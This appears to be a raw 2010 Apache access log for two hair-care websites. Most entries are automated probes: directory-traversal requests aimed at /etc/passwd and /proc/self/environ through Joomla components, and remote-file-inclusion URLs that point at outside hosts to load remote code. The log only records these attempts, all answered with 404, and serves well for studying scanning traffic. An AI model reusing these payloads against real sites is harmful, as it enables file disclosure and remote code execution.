77.8.109.10 - - [14/Jun/2010:05:43:54 -0700] "GET /logs/access_100419.log HTTP/1.0" 200 2205014 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:43:59 -0700] "GET /logs/access_100426.log HTTP/1.0" 200 2491092 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:44:05 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:44:10 -0700] "GET /logs/access_100510.log HTTP/1.0" 200 2798780 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:44:16 -0700] "GET /logs/access_100517.log HTTP/1.0" 200 3119686 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:44:21 -0700] "GET /logs/access_100524.log HTTP/1.0" 200 2784909 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:44:27 -0700] "GET /logs/access_100531.log HTTP/1.0" 200 3581898 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:44:34 -0700] "GET /logs/access_100607.log HTTP/1.0" 200 3708257 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:44:40 -0700] "GET /logs/access_100614.log HTTP/1.0" 200 3596831 "http://freehairsecrets.com/logs/" "Wget/1.11.4" "freehairsecrets.com"
220.181.7.100 - - [14/Jun/2010:05:47:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3987 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.8.109.10 - - [14/Jun/2010:05:48:44 -0700] "GET /logs/ HTTP/1.0" 200 5927 "-" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:48:45 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:48:45 -0700] "GET /logs/?N=D HTTP/1.0" 200 5927 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:48:45 -0700] "GET /logs/?M=A HTTP/1.0" 200 5927 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:48:46 -0700] "GET /logs/?S=A HTTP/1.0" 200 5927 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:48:46 -0700] "GET /logs/?D=A HTTP/1.0" 200 5927 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:48:50 -0700] "GET /logs/access_100315.log HTTP/1.0" 200 2504047 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:48:55 -0700] "GET /logs/access_100322.log HTTP/1.0" 200 2573876 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:00 -0700] "GET /logs/access_100329.log HTTP/1.0" 200 2946869 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:05 -0700] "GET /logs/access_100405.log HTTP/1.0" 200 2516499 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:09 -0700] "GET /logs/access_100412.log HTTP/1.0" 200 2139776 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:13 -0700] "GET /logs/access_100419.log HTTP/1.0" 200 2205014 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:18 -0700] "GET /logs/access_100426.log HTTP/1.0" 200 2491092 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:23 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:28 -0700] "GET /logs/access_100510.log HTTP/1.0" 200 2798780 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:33 -0700] "GET /logs/access_100517.log HTTP/1.0" 200 3119686 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:38 -0700] "GET /logs/access_100524.log HTTP/1.0" 200 2784909 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:45 -0700] "GET /logs/access_100531.log HTTP/1.0" 200 3581898 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:51 -0700] "GET /logs/access_100607.log HTTP/1.0" 200 3708257 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
77.8.109.10 - - [14/Jun/2010:05:49:57 -0700] "GET /logs/access_100614.log HTTP/1.0" 200 3596831 "http://growlonghairfast.com/logs/" "Wget/1.11.4" "growlonghairfast.com"
205.251.131.33 - - [14/Jun/2010:05:50:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:05:53:10 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
79.175.165.14 - - [14/Jun/2010:05:56:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.195.37.176 - - [14/Jun/2010:06:01:00 -0700] "GET /logs/?D=D HTTP/1.0" 200 5927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
205.251.131.33 - - [14/Jun/2010:06:02:26 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:04:03 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:04:03 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:04:03 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:04:53 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:04:53 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:04:53 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:05:32 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:05:32 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:05:32 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:28 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:28 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:28 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:57 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:57 -0700] "GET /logs/access_100510.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:57 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:58 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:58 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [14/Jun/2010:06:06:58 -0700] "GET /logs/access_100510.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:15:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:17:15 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:18:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:18:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:19:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:20:38 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
218.38.34.19 - - [14/Jun/2010:06:20:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
72.52.150.147 - - [14/Jun/2010:06:21:18 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.212.226.210 - - [14/Jun/2010:06:25:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "growlonghairfast.com"
91.212.226.210 - - [14/Jun/2010:06:25:59 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:28:51 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:28:52 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:28:53 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
69.163.180.32 - - [14/Jun/2010:06:29:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:06:33:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:33:29 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:33:30 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:33:30 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:06:35:55 -0700] "GET /login.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:06:35:55 -0700] "GET /logs//login.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:06:35:55 -0700] "GET /logs/access_091221.log//login.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [14/Jun/2010:06:36:23 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)" "freehairsecrets.com"
91.212.226.210 - - [14/Jun/2010:06:36:23 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)" "freehairsecrets.com"
80.247.77.7 - - [14/Jun/2010:06:37:36 -0700] "GET /logs//login.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:06:37:37 -0700] "GET /logs/access_091221.log//login.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.247.77.7 - - [14/Jun/2010:06:37:37 -0700] "GET /login.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:39:03 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:39:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:39:05 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:06:41:04 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:06:41:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
58.120.226.47 - - [14/Jun/2010:06:41:06 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:06:41:28 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:06:41:28 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:42:51 -0700] "GET /logs/access_100510.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:43:45 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:43:46 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:43:47 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:44:03 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:44:03 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
72.52.150.147 - - [14/Jun/2010:06:44:03 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://myspacebuilder.net//_theme/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:46:23 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:46:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
218.38.34.19 - - [14/Jun/2010:06:46:24 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:46:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:47:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:48:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:48:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:49:28 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.203.180.144 - - [14/Jun/2010:06:49:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.203.180.144 - - [14/Jun/2010:06:49:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:58:14 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:58:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:58:14 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:58:32 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:58:33 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:06:58:33 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:06:58:57 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:06:58:58 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:06:58:58 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
219.255.132.83 - - [14/Jun/2010:06:59:07 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:06:59:54 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:06:59:54 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:06:59:56 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:00:24 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:00:24 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:00:27 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:01:02 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:01:02 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:01:02 -0700] "GET /logs/access_100125.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.207.174.229 - - [14/Jun/2010:07:01:23 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
77.207.174.229 - - [14/Jun/2010:07:01:24 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:01:27 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:01:27 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:01:27 -0700] "GET /logs/access_100125.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:04:32 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
